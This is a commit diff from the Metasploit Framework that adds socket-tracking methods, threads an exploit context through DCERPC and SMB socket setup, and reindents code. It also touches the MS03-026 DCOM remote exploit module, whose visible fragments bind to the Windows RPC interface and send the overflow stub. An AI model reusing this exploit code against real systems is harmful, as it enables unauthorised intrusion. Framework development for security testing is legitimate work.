fixes for some socket association stuff
git-svn-id: file:///home/svn/incoming/trunk@3233 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
6d087fe0f3
commit
410770bae6
|
@ -166,6 +166,20 @@ class Exploit < Msf::Module
|
|||
Exploit::Type::Remote
|
||||
end
|
||||
|
||||
#
|
||||
# Adds a socket to the list of sockets opened by this exploit.
|
||||
#
|
||||
def add_socket(sock)
|
||||
self.sockets << sock
|
||||
end
|
||||
|
||||
#
|
||||
# Removes a socket from the list of sockets.
|
||||
#
|
||||
def remove_socket(sock)
|
||||
self.sockets.delete(sock)
|
||||
end
|
||||
|
||||
#
|
||||
# This method is called once a new session has been created on behalf of
|
||||
# this exploit instance and all socket connections created by this
|
||||
|
|
|
@ -17,8 +17,8 @@ module Exploit::Remote::DCERPC
|
|||
DCERPCPacket = Rex::Proto::DCERPC::Packet
|
||||
DCERPCClient = Rex::Proto::DCERPC::Client
|
||||
DCERPCResponse = Rex::Proto::DCERPC::Response
|
||||
DCERPCUUID = Rex::Proto::DCERPC::UUID
|
||||
NDR = Rex::Proto::DCERPC::NDR
|
||||
DCERPCUUID = Rex::Proto::DCERPC::UUID
|
||||
NDR = Rex::Proto::DCERPC::NDR
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
@ -34,31 +34,34 @@ module Exploit::Remote::DCERPC
|
|||
Opt::RHOST,
|
||||
Opt::RPORT(135),
|
||||
], Msf::Exploit::Remote::DCERPC
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def dcerpc_handle (uuid, version, protocol, opts)
|
||||
self.handle = Rex::Proto::DCERPC::Handle.new([uuid, version], protocol, datastore['RHOST'], opts)
|
||||
end
|
||||
def dcerpc_handle (uuid, version, protocol, opts)
|
||||
self.handle = Rex::Proto::DCERPC::Handle.new([uuid, version], protocol, datastore['RHOST'], opts)
|
||||
end
|
||||
|
||||
def dcerpc_bind (h)
|
||||
if datastore['DCERPCFragSize']
|
||||
opts['frag_size'] = datastore['DCERPCFragSize']
|
||||
end
|
||||
def dcerpc_bind (h)
|
||||
opts = { 'Msf' => framework, 'MsfExploit' => self }
|
||||
|
||||
if datastore['DCERPCFakeMultiBind']
|
||||
opts['fake_multi_bind'] = 1
|
||||
end
|
||||
if datastore['DCERPCFragSize']
|
||||
opts['frag_size'] = datastore['DCERPCFragSize']
|
||||
end
|
||||
|
||||
self.dcerpc = Rex::Proto::DCERPC::Client.new(h, dcerpc_socket(), opts)
|
||||
if self.handle.protocol == 'ncacn_np'
|
||||
self.simple = self.dcerpc.smb # expose the simple client if we have access to it
|
||||
end
|
||||
end
|
||||
if datastore['DCERPCFakeMultiBind']
|
||||
opts['fake_multi_bind'] = 1
|
||||
end
|
||||
|
||||
def dcerpc_call (function, stub = '')
|
||||
dcerpc.call(function, stub)
|
||||
end
|
||||
self.dcerpc = Rex::Proto::DCERPC::Client.new(h, dcerpc_socket(), opts)
|
||||
|
||||
if self.handle.protocol == 'ncacn_np'
|
||||
self.simple = self.dcerpc.smb # expose the simple client if we have access to it
|
||||
end
|
||||
end
|
||||
|
||||
def dcerpc_call (function, stub = '')
|
||||
dcerpc.call(function, stub)
|
||||
end
|
||||
|
||||
# Convert a standard ASCII string to 16-bit Unicode
|
||||
def unicode (str)
|
||||
|
@ -66,7 +69,7 @@ module Exploit::Remote::DCERPC
|
|||
end
|
||||
|
||||
# Used to track the last DCERPC context
|
||||
attr_accessor :dcerpc_bind_context, :handle, :dcerpc, :dcerpc_socket
|
||||
attr_accessor :dcerpc_bind_context, :handle, :dcerpc, :dcerpc_socket
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -64,21 +64,25 @@ require 'rex/proto/smb/exceptions'
|
|||
|
||||
# Create the appropriate socket based on protocol
|
||||
def socket_setup()
|
||||
ctx = { 'Msf' => options['Msf'], 'MsfExploit' => options['MsfExploit'] }
|
||||
self.socket = case self.handle.protocol
|
||||
when 'ncacn_ip_tcp' then Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => self.handle.options[0])
|
||||
when 'ncacn_ip_tcp' then Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => self.handle.options[0], 'Context' => ctx)
|
||||
when 'ncacn_np' then begin
|
||||
socket = ''
|
||||
begin
|
||||
timeout(10) {
|
||||
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 445)
|
||||
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 445, 'Context' => ctx)
|
||||
}
|
||||
rescue Timeout::Error, Rex::ConnectionRefused
|
||||
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 139)
|
||||
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 139, 'Context' => ctx)
|
||||
end
|
||||
socket
|
||||
end
|
||||
else nil
|
||||
end
|
||||
|
||||
# Add this socket to the exploit's list of open sockets
|
||||
options['MsfExploit'].add_socket(self.socket) if (options['MsfExploit'])
|
||||
end
|
||||
|
||||
def smb_connect()
|
||||
|
|
|
@ -60,11 +60,11 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
|||
connect
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
# Carefully create the combination of addresses and code for cross-os exploitation
|
||||
xpseh = Rex::Text.rand_text_alphanumeric(360, payload_badchars)
|
||||
|
||||
|
@ -176,12 +176,11 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
|||
NDR.long(rand(0xFFFFFFFF))
|
||||
|
||||
|
||||
print_status('sending exploit ...')
|
||||
begin
|
||||
dcerpc_call(0, stubdata)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
print_status('server did not respond, but we do not expect it to.')
|
||||
end
|
||||
print_status('sending exploit ...')
|
||||
begin
|
||||
dcerpc_call(0, stubdata)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
Loading…
Reference in New Issue